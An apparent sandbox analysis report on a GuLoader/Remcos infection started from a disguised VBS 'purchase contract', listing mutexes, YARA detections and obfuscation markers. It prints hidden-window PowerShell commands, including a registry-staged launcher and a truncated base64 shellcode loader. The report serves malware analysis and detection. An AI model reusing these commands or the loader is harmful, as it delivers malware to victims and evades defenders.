Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-WPACZI
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:304:WilStaging_02
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000019.00000002.398154379475.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.397021989403.0000000000A50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.398588130377.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.397158688650.0000000009330000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398097409576.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.398031216863.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.398540029025.0000000003230000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.398480532296.0000000003230000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $OBITUARY=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Billiond5;powershell.exe -windowstyle hidden -encodedcommand($OBITUARY)
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $OBITUARY=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Billiond5;powershell.exe -windowstyle hidden -encodedcommand($OBITUARY)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_070AF658 pushad ; iretd 4_2_070AF659
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F20700 pushad ; iretd 4_2_07F20701
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F20880 pushfd ; iretd 4_2_07F20881
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F7A4FF pushad ; retn 0007h 4_2_07F7A512
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F7CC37 pushfd ; retn 0007h 4_2_07F7CC42
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07F81853 push 2407C3DFh; iretd 4_2_07F8185D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC228B push eax; mov dword ptr [esp], edx 4_2_07FC2294
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC7F10 pushfd ; ret 4_2_07FC819A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC2603 push edi; ret 4_2_07FC260A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC35F7 pushad ; ret 4_2_07FC35F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC8368 pushfd ; ret 4_2_07FC836A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC836B pushfd ; ret 4_2_07FC8372
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC2311 push esi; ret 4_2_07FC2312
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC8313 pushfd ; ret 4_2_07FC831A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC230D push esi; ret 4_2_07FC230E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC2308 push edi; ret 4_2_07FC230A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC82D9 pushfd ; ret 4_2_07FC82DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC82C1 pushfd ; ret 4_2_07FC82C2
